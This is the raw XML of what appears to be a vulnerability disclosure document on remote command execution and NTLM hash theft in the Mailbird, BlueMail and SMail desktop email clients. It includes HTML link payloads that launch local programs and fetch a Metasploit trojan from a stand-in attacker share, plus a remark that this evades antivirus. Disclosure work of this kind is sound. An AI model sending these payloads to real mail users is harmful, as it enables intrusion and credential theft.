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R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emote Command Execution in Multiple Email Desktops</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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@ChandlerChen @testert1ng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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Details in Affected APP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40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>App name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496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>Affected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>Mailbird</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496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>3.0.10.0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>Blue mail desktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496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>1.137.3-S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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>Build 15237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>SMail-community</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496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2"/>
                <w:szCs w:val="40"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2.5.1.02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Details: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All these above desktop don</w:t>
      </w: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t>’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 xml:space="preserve">t filter file:// protocol and UNC path, which may lead to remote command execution and ntlm hash stealing. Suppose the attacker insert payload like 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instrText xml:space="preserve"> HYPERLINK "\\\\attacker_ip\\share_directory\\trojan.exe" </w:instrTex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sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\\attacker_ip\share_directory\trojan.exe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 xml:space="preserve"> into email and send to the victim. Once clicking, the victim would get controlled, and the attacker may get a reverse shell and execute any commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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Ways to reproduce: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Use python script send email with html-based payload to victim. The payloads include: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&lt;a href=file:\\\c:\windows\system32\calc.exe&gt;Payload1&lt;/a&gt;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&lt;a href=c:\windows\system32\calc.exe&gt;Payload2&lt;/a&gt;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&lt;a href=\\attacker_ip\share_directory\trojan.exe&gt;Payload3&lt;/a&gt;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BTW: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 xml:space="preserve">trojan.exe is created by metasploit, the remote port and IP address has been set according to our experiment. And we have tested that this type of exploitation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>i.e.</w:t>
      </w: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 xml:space="preserve">, exploit with UNC path to launch the trojan, could escape from the virus engine including Windows defender. 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 xml:space="preserve">Victims receive the email and open it. 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The calc.exe pops out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SMail Community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69865" cy="6327775"/>
            <wp:effectExtent l="0" t="0" r="698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Mailbird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1770" cy="7370445"/>
            <wp:effectExtent l="0" t="0" r="508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40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Bluemail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66690" cy="4164330"/>
            <wp:effectExtent l="0" t="0" r="1016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The trojan gets on line and the attacker could execute any commands.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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5001895" cy="3723005"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1079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40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ntlm hash poc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1045" cy="1818640"/>
            <wp:effectExtent l="0" t="0" r="1905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D3628"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BD3D362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B845497"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0B8454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2520434"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="425204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iYTc1ODMyZWFkOWZiM2FiZTBhMzUyY2VhMzM4NDIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="01A9561E"/>
    <w:rsid w:val="07E67DEC"/>
    <w:rsid w:val="09FE10E3"/>
    <w:rsid w:val="1848454A"/>
    <w:rsid w:val="1E5224B3"/>
    <w:rsid w:val="2CCC5030"/>
    <w:rsid w:val="2E60513A"/>
    <w:rsid w:val="33B7605A"/>
    <w:rsid w:val="404C1BBE"/>
    <w:rsid w:val="41F5228C"/>
    <w:rsid w:val="4BF2341E"/>
    <w:rsid w:val="4E3F53D2"/>
    <w:rsid w:val="4E90148E"/>
    <w:rsid w:val="69D84E55"/>
    <w:rsid w:val="6CBB4186"/>
    <w:rsid w:val="6E761835"/>
    <w:rsid w:val="7C8C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next w:val="1"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cstheme="majorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA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2024-01-10T06:43:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>wwb</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-03T03:44:02Z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E53130D07A3140F1B51746FBD7004C9F_13</vt:lpwstr>
  </property>
</Properties>
</file>